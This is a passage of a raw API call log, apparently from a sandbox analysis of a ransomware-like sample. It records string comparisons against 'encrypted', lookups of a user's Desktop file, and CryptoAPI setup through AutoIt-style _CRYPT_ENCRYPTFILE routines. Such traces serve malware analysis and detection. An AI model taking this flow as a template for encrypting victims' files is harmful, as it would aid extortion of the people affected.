HALPmcxz\\Desktop\\kYfCsY7fw675g46j6.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.013] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Desktop\\kYfCsY7fw675g46j6.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.013] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Desktop\\kYfCsY7fw675g46j6.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.013] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Desktop\\kYfCsY7fw675g46j6.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.013] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Desktop\\kYfCsY7fw675g46j6.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.013] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Desktop\\kYfCsY7fw675g46j6.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0030.013] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Desktop\\kYfCsY7fw675g46j6.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.013] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Desktop\\kYfCsY7fw675g46j6.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.014] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Desktop\\kYfCsY7fw675g46j6.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0030.014] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Desktop\\kYfCsY7fw675g46j6.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.014] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Desktop\\kYfCsY7fw675g46j6.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0030.014] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Desktop\\kYfCsY7fw675g46j6.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.014] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Desktop\\kYfCsY7fw675g46j6.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.014] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Desktop\\kYfCsY7fw675g46j6.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.014] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Desktop\\kYfCsY7fw675g46j6.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0030.014] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Desktop\\kYfCsY7fw675g46j6.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.014] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Desktop\\kYfCsY7fw675g46j6.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.014] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Desktop\\kYfCsY7fw675g46j6.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0030.014] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Desktop\\kYfCsY7fw675g46j6.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0030.014] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="esktop\\kYfCsY7fw675g46j6.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.014] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sktop\\kYfCsY7fw675g46j6.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.014] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ktop\\kYfCsY7fw675g46j6.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.014] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="top\\kYfCsY7fw675g46j6.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.014] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="op\\kYfCsY7fw675g46j6.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.014] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p\\kYfCsY7fw675g46j6.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.014] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\kYfCsY7fw675g46j6.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0030.014] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="kYfCsY7fw675g46j6.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.014] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="YfCsY7fw675g46j6.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.014] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="fCsY7fw675g46j6.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.014] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CsY7fw675g46j6.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0030.014] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sY7fw675g46j6.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.014] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Y7fw675g46j6.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.014] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="7fw675g46j6.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0030.014] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="fw675g46j6.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.014] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="w675g46j6.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.014] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="675g46j6.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0030.014] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="75g46j6.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0030.014] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5g46j6.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0030.014] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="g46j6.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.014] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="46j6.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0030.014] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd60 | out: hHeap=0x770000) returned 1 [0030.014] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc70 | out: hHeap=0x770000) returned 1 [0030.014] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ac0 | out: hHeap=0x770000) returned 1 [0030.014] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889688 | out: hHeap=0x770000) returned 1 [0030.014] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1648 | out: hHeap=0x770000) returned 1 [0030.014] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0030.014] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0030.015] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0030.015] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0030.015] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0030.015] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0030.015] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b45c8 | out: hHeap=0x770000) returned 1 [0030.015] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0030.015] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0030.015] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b45c8 | out: hHeap=0x770000) returned 1 [0030.015] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0030.015] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0030.015] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="v", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0030.015] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="av", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0030.015] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="wav", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0030.015] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".wav", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0030.015] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c868 | out: hHeap=0x770000) returned 1 [0030.015] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889b08 | out: hHeap=0x770000) returned 1 [0030.015] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb80 | out: hHeap=0x770000) returned 1 [0030.015] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c880 | out: hHeap=0x770000) returned 1 [0030.015] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccb8 | out: hHeap=0x770000) returned 1 [0030.015] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889430 | out: hHeap=0x770000) returned 1 [0030.015] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b17d8 | out: hHeap=0x770000) returned 1 [0030.015] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0030.015] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0030.015] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0030.015] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0030.015] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0030.015] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.015] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\kYfCsY7fw675g46j6.wav", lpFindFileData=0x6ae7b8 | out: lpFindFileData=0x6ae7b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5742c440, ftCreationTime.dwHighDateTime=0x1d5c5ba, ftLastAccessTime.dwLowDateTime=0xe91d5530, ftLastAccessTime.dwHighDateTime=0x1d5c009, ftLastWriteTime.dwLowDateTime=0xe91d5530, ftLastWriteTime.dwHighDateTime=0x1d5c009, nFileSizeHigh=0x0, nFileSizeLow=0xeb65, dwReserved0=0x6ae908, dwReserved1=0x777648, cFileName="kYfCsY7fw675g46j6.wav", cAlternateFileName="KYFCSY~1.WAV")) returned 0x7c2240 [0030.015] FindClose (in: hFindFile=0x7c2240 | out: hFindFile=0x7c2240) returned 1 [0030.015] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbc8 | out: hHeap=0x770000) returned 1 [0030.016] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889af0 | out: hHeap=0x770000) returned 1 [0030.016] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1918 | out: hHeap=0x770000) returned 1 [0030.016] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0030.016] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.016] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0030.016] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1738 | out: hHeap=0x770000) returned 1 [0030.016] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da138 | out: hHeap=0x770000) returned 1 [0030.016] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0030.016] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0030.016] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0030.016] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0030.016] PeekMessageW (in: lpMsg=0x6ae6f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6f4) returned 0 [0030.016] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0030.016] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x754b0000 [0030.016] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7f0 | out: hHeap=0x770000) returned 1 [0030.016] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889c10 | out: hHeap=0x770000) returned 1 [0030.016] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1aa8 | out: hHeap=0x770000) returned 1 [0030.016] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0030.016] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0030.016] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0030.016] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0030.016] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0030.016] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0030.016] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0030.016] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0030.016] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0030.016] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897d8 | out: hHeap=0x770000) returned 1 [0030.016] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1968 | out: hHeap=0x770000) returned 1 [0030.016] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da148 | out: hHeap=0x770000) returned 1 [0030.016] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1788 | out: hHeap=0x770000) returned 1 [0030.017] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7f0 | out: hHeap=0x770000) returned 1 [0030.017] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0030.017] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1aa8 | out: hHeap=0x770000) returned 1 [0030.017] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889c10 | out: hHeap=0x770000) returned 1 [0030.017] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a08 | out: hHeap=0x770000) returned 1 [0030.017] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0030.017] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0030.017] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0030.017] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0030.017] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da268 | out: hHeap=0x770000) returned 1 [0030.017] PeekMessageW (in: lpMsg=0x6ae4c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae4c4) returned 0 [0030.017] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0030.017] CryptAcquireContextA (in: phProv=0x6ae498, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x6ae498*=0x7d5c40) returned 1 [0030.018] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0030.018] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0030.018] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0030.018] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0030.018] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2f8 | out: hHeap=0x770000) returned 1 [0030.018] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0030.018] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0030.018] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0030.018] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb98 | out: hHeap=0x770000) returned 1 [0030.018] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1cd8 | out: hHeap=0x770000) returned 1 [0030.018] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0030.018] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1800 | out: hHeap=0x770000) returned 1 [0030.018] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889aa8 | out: hHeap=0x770000) returned 1 [0030.018] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2f8 | out: hHeap=0x770000) returned 1 [0030.018] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1968 | out: hHeap=0x770000) returned 1 [0030.018] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889490 | out: hHeap=0x770000) returned 1 [0030.018] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b98 | out: hHeap=0x770000) returned 1 [0030.018] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0030.018] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2140 | out: hHeap=0x770000) returned 1 [0030.018] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0030.018] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2240 | out: hHeap=0x770000) returned 1 [0030.018] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0030.018] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0030.018] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0030.018] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2f8 | out: hHeap=0x770000) returned 1 [0030.018] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0030.018] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0030.018] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0030.018] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889490 | out: hHeap=0x770000) returned 1 [0030.019] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0030.019] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.019] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.019] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.019] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0030.019] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0030.019] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0030.019] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.019] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.019] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0030.019] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1af8 | out: hHeap=0x770000) returned 1 [0030.019] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da268 | out: hHeap=0x770000) returned 1 [0030.019] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0030.019] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0030.019] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0030.019] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da378 | out: hHeap=0x770000) returned 1 [0030.019] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0030.019] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0030.019] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2200 | out: hHeap=0x770000) returned 1 [0030.019] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0030.019] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0030.019] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0030.019] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da268 | out: hHeap=0x770000) returned 1 [0030.019] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0030.019] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0030.019] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0030.019] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889220 | out: hHeap=0x770000) returned 1 [0030.019] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0030.019] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.019] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.020] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0030.020] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0030.020] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da278 | out: 